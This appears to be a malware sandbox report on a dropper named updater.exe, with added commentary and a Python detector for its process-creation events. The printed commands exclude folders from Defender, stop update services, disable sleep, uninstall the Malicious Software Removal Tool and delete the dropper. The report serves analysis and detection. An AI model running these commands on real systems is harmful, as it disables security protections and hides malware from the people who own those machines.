          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: napinsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wshbth.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: nlaapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: winrnr.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll (this identical entry is repeated 45 times in the report)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: updater.exe | Static PE information: Image base 0x140000000 > 0x60000000
          Source: updater.exe | Static file information: File size 2728960 > 1048576
          Source: updater.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x27d800
          Source: updater.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr
          Source: updater.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: updater.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: updater.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: updater.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: updater.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: updater.exe | Static PE information: section name: .00cfg
          Source: updater.exe.0.dr | Static PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\updater.exe | Code function: 0_2_00007FF6568E1394 push qword ptr [00007FF6568ED004h]; ret 0_2_00007FF6568E1403
          Source: C:\ProgramData\Google\Chrome\updater.exe | Code function: 36_2_00007FF758EE1394 push qword ptr [00007FF758EED004h]; ret 36_2_00007FF758EE1403
          Source: C:\Windows\System32\conhost.exe | Code function: 60_2_0000000140001394 push qword ptr [0000000140009004h]; ret 60_2_0000000140001403

          Persistence and Installation Behavior

          Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\zlvyxohjpfnw.sys
          Source: C:\Users\user\Desktop\updater.exe | File created: C:\ProgramData\Google\Chrome\updater.exe (dropped file)
          Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\Temp\zlvyxohjpfnw.sys (dropped file)
          Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 entries)
          Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"
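The process-creation rows in this report (sc.exe stopping WaaSMedicSvc, wuauserv, bits, dosvc and UsoSvc; powercfg.exe zeroing the standby and hibernate timeouts so the host never sleeps while mining; cmd.exe running wusa /uninstall /kb:890830 to remove the Malicious Software Removal Tool; and the delayed cmd /c choice ... & Del self-deletion of the original dropper) are the footprint a Sysmon Event ID 1 or EDR process feed would record. The block below is an added example written for this page, not code from the Joe Sandbox report or from the sample: a small Python detector that labels each command line and scores parents whose children hit more than one of those technique families. The event list is constructed from the rows above plus two benign lines; the label names, the service list and the threshold of two families are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample events (parent image, child command line). They mirror the
# "Process created" rows of the report plus two benign admin commands; they
# are not captured telemetry.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\updater.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (r"C:\Users\user\Desktop\updater.exe",
     r'C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"'),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\system32\sc.exe stop wuauserv"),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\system32\sc.exe stop bits"),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\system32\sc.exe stop dosvc"),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\system32\conhost.exe"),
    (r"C:\Windows\System32\cmd.exe", r"wusa /uninstall /kb:890830 /quiet /norestart"),
    # Benign noise: an admin stopping an unrelated service and a 15 minute monitor timeout.
    (r"C:\Windows\System32\cmd.exe", r"sc.exe stop Spooler"),
    (r"C:\Windows\System32\cmd.exe", r"powercfg.exe /x -monitor-timeout-ac 15"),
]

# Windows Update / delivery services the installer disables (service names are
# case-insensitive, so they are compared lower-cased).
UPDATE_SERVICES = {"waasmedicsvc", "wuauserv", "bits", "dosvc", "usosvc"}

SC_STOP_RE = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", re.I)
# Only a timeout of 0 (never sleep/hibernate) is interesting; other values are normal tuning.
POWERCFG_ZERO_RE = re.compile(r"-(?:hibernate|standby|monitor|disk)-timeout-(?:ac|dc)\s+0\b", re.I)
WUSA_MSRT_RE = re.compile(r"\bwusa(?:\.exe)?\s+/uninstall\s+/kb:890830\b", re.I)
# "choice ... & del" is the classic delayed self-delete one-liner.
SELF_DELETE_RE = re.compile(r"\bchoice\b[^&|]*[&|]+\s*del\b", re.I)


def classify(cmdline):
    """Return the set of technique labels a single command line matches."""
    labels = set()
    m = SC_STOP_RE.search(cmdline)
    if m and m.group(1).lower() in UPDATE_SERVICES:
        labels.add("stop_update_service:" + m.group(1).lower())
    if "powercfg" in cmdline.lower() and POWERCFG_ZERO_RE.search(cmdline):
        labels.add("powercfg_zero_timeout")
    if WUSA_MSRT_RE.search(cmdline):
        labels.add("wusa_uninstall_msrt")
    if SELF_DELETE_RE.search(cmdline):
        labels.add("cmd_choice_self_delete")
    return labels


def technique_families(labels):
    """Collapse 'family:detail' labels to their family name."""
    return {label.split(":", 1)[0] for label in labels}


def score_parents(events):
    """Map each parent image to the union of labels hit by its children."""
    by_parent = defaultdict(set)
    for parent, cmdline in events:
        by_parent[parent] |= classify(cmdline)
    return dict(by_parent)


def suspicious_parents(events, min_families=2):
    """Parents whose children cover at least min_families distinct technique
    families; returns {parent: sorted labels}. One family alone (an admin
    stopping BITS, say) is not enough to alert on."""
    hits = {}
    for parent, labels in score_parents(events).items():
        if len(technique_families(labels)) >= min_families:
            hits[parent] = sorted(labels)
    return hits


if __name__ == "__main__":
    for parent, labels in suspicious_parents(SAMPLE_EVENTS).items():
        print(parent)
        for label in labels:
            print("    " + label)
```

With the constructed events both updater.exe instances are flagged (the desktop dropper for stop_update_service plus cmd_choice_self_delete, the ProgramData copy for four service stops plus powercfg_zero_timeout), while cmd.exe is not: its only hit is the wusa KB890830 removal, because the flat list attributes that child to cmd.exe rather than to whatever spawned cmd.exe. A production rule should walk the process tree to the root, and it should also treat the bare `svchost.exe` launched by updater.exe (no `-k <group>` argument, not a child of services.exe) as a separate signal, since that is how the injected mining host shows up in this report.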
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (this identical entry is repeated 75 times in the report)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9896
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9942
          Source: C:\ProgramData\Google\Chrome\updater.exe Dropped PE file which has not been started: C:\Windows\Temp\zlvyxohjpfnw.sys
          Source: C:\Users\user\Desktop\updater.exe API coverage: 7.2 %
          Source: C:\ProgramData\Google\Chrome\updater.exe API coverage: 7.2 %
          Source: C:\Windows\System32\conhost.exe API coverage: 1.2 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4344 Thread sleep count: 9896 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608 Thread sleep count: 9942 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7012 Thread sleep count: 44 > 30
          Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: svchost.exe, 0000003E.00000002.346493278590.00000254DD665000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000003E.00000002.346493421715.00000254DD671000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USn
          Source: svchost.exe, 0000003E.00000002.346493205064.00000254DD613000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@bg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\updater.exe Code function: 0_2_00007FF6568E118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF6568E118B
          Source: C:\Users\user\Desktop\updater.exe Code function: 0_2_00007FF6568E11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF6568E11D8
          Source: C:\ProgramData\Google\Chrome\updater.exe Code function: 36_2_00007FF758EE118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 36_2_00007FF758EE118B
          Source: C:\ProgramData\Google\Chrome\updater.exe Code function: 36_2_00007FF758EE11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 36_2_00007FF758EE11D8
          Source: C:\Windows\System32\conhost.exe Code function: 60_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 60_2_0000000140001160

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Google\Chrome\updater.exe Thread register set: target process: 2404
          Source: C:\ProgramData\Google\Chrome\updater.exe Thread register set: target process: 6248
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
